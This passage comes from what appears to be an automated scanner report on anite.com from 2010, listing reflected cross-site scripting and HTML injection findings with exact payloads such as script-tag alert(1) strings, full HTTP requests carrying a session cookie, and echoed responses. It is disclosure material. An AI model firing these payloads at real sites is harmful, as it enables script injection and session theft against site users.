<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/8a0f9"><script>alert(1)</script>8be7096d64e#up">
...[SNIP]...

1.191. http://anite.com/quality-testing-networkmeasurement.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/quality-testing-networkmeasurement.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c00ce"><a>a134d683dda was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /quality-testing-networkmeasurement.html?c00ce"><a>a134d683dda=1 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:10:00 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:10:01 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/quality-testing-networkmeasurement.html?c00ce"><a>a134d683dda=1#up">
...[SNIP]...

1.192. http://anite.com/rail-operator-software.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://anite.com
Path:	/rail-operator-software.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 134bd"><script>alert(1)</script>84bbe870019 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /134bd"><script>alert(1)</script>84bbe870019 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 404 NOT FOUND
Date: Thu, 25 Nov 2010 15:14:15 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:14:16 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/134bd"><script>alert(1)</script>84bbe870019#up">
...[SNIP]...

1.193. http://anite.com/rail-operator-software.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/rail-operator-software.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6e0b"><a>dd8d9f7babb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /rail-operator-software.html?b6e0b"><a>dd8d9f7babb=1 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 404 NOT FOUND
Date: Thu, 25 Nov 2010 15:13:55 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:13:56 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/rail-operator-software.html?b6e0b"><a>dd8d9f7babb=1#up">
...[SNIP]...

1.194. http://anite.com/rd-rss-10.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://anite.com
Path:	/rd-rss-10.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 673d0"><script>alert(1)</script>8a080e8f7cb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /673d0"><script>alert(1)</script>8a080e8f7cb HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 404 NOT FOUND
Date: Thu, 25 Nov 2010 15:18:43 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:18:43 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/673d0"><script>alert(1)</script>8a080e8f7cb#up">
...[SNIP]...

1.195. http://anite.com/rd-rss-9.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://anite.com
Path:	/rd-rss-9.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb644"><script>alert(1)</script>4032a5790ca was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bb644"><script>alert(1)</script>4032a5790ca HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 404 NOT FOUND
Date: Thu, 25 Nov 2010 15:17:23 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:17:23 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/bb644"><script>alert(1)</script>4032a5790ca#up">
...[SNIP]...

1.196. http://anite.com/recruitment-3.html [Itemid parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/recruitment-3.html

Issue detail

The value of the Itemid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46492"><a>d82b1bd5a46 was submitted in the Itemid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /recruitment-3.html?Itemid=46546492"><a>d82b1bd5a46 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:15:43 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:15:43 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/recruitment-3.html?Itemid=46546492"><a>d82b1bd5a46#up">
...[SNIP]...

1.197. http://anite.com/recruitment-3.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://anite.com
Path:	/recruitment-3.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 18b83"><script>alert(1)</script>b8cbee33d3d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /18b83"><script>alert(1)</script>b8cbee33d3d HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 404 NOT FOUND
Date: Thu, 25 Nov 2010 15:15:51 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:15:51 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/18b83"><script>alert(1)</script>b8cbee33d3d#up">
...[SNIP]...

1.198. http://anite.com/recruitment-3.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/recruitment-3.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 472f4"><a>777057dbc7a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /recruitment-3.html?472f4"><a>777057dbc7a=1 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:15:31 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:15:32 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/recruitment-3.html?472f4"><a>777057dbc7a=1#up">
...[SNIP]...

1.199. http://anite.com/rss.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://anite.com
Path:	/rss.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29610"><script>alert(1)</script>ec82b91af27 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /29610"><script>alert(1)</script>ec82b91af27 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 404 NOT FOUND
Date: Thu, 25 Nov 2010 15:08:24 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:08:24 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/29610"><script>alert(1)</script>ec82b91af27#up">
...[SNIP]...

1.200. http://anite.com/saas-anite.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://anite.com
Path:	/saas-anite.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f83ba"><script>alert(1)</script>5c3d2b3c4b9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /f83ba"><script>alert(1)</script>5c3d2b3c4b9 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 404 NOT FOUND
Date: Thu, 25 Nov 2010 15:14:55 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:14:55 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/f83ba"><script>alert(1)</script>5c3d2b3c4b9#up">
...[SNIP]...

1.201. http://anite.com/saas-anite.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/saas-anite.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86258"><a>cd01e8562bf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /saas-anite.html?86258"><a>cd01e8562bf=1 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 404 NOT FOUND
Date: Thu, 25 Nov 2010 15:14:35 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:14:35 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/saas-anite.html?86258"><a>cd01e8562bf=1#up">
...[SNIP]...

1.202. http://anite.com/search-mainmenu-15.html [Itemid parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/search-mainmenu-15.html

Issue detail

The value of the Itemid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68509"><a>a542d0c9621 was submitted in the Itemid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /search-mainmenu-15.html?searchword=%27&Itemid=168509"><a>a542d0c9621 HTTP/1.1
Host: anite.com
Proxy-Connection: keep-alive
Referer: http://anite.com/
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utmb=188041464

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:08:37 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-Content-Encoded-By: Joomla! 1.5
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:08:37 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 32052

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/search-mainmenu-15.html?searchword=%27&Itemid=168509"><a>a542d0c9621#up">
...[SNIP]...

1.203. http://anite.com/search-mainmenu-15.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://anite.com
Path:	/search-mainmenu-15.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e09d2"><script>alert(1)</script>ff7a5357c9ddb7244 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /e09d2"><script>alert(1)</script>ff7a5357c9ddb7244?searchword=%2500&searchphrase=all&ordering=newest&task=search HTTP/1.1
Host: anite.com
Proxy-Connection: keep-alive
Referer: http://anite.com/search-mainmenu-15.html?searchword=%27&Itemid=1
Cache-Control: max-age=0
Origin: http://anite.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utmb=188041464

Response

HTTP/1.0 404 NOT FOUND
Date: Thu, 25 Nov 2010 15:08:49 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-Content-Encoded-By: Joomla! 1.5
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:08:49 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 30326

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/e09d2"><script>alert(1)</script>ff7a5357c9ddb7244?searchword=%2500&searchphrase=all&ordering=newest&task=search#up">
...[SNIP]...

1.204. http://anite.com/search-mainmenu-15.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://anite.com
Path:	/search-mainmenu-15.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b042f"><script>alert(1)</script>3249cf38ae1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /b042f"><script>alert(1)</script>3249cf38ae1?searchword=%27&Itemid=1 HTTP/1.1
Host: anite.com
Proxy-Connection: keep-alive
Referer: http://anite.com/
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utmb=188041464

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:09:02 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-Content-Encoded-By: Joomla! 1.5
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:09:02 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 34860

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/b042f"><script>alert(1)</script>3249cf38ae1?searchword=%27&Itemid=1#up">
...[SNIP]...

1.205. http://anite.com/search-mainmenu-15.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/search-mainmenu-15.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4312b"><a>db93c8f56f2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /search-mainmenu-15.html?searchword=%27&Itemid=1&4312b"><a>db93c8f56f2=1 HTTP/1.1
Host: anite.com
Proxy-Connection: keep-alive
Referer: http://anite.com/
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
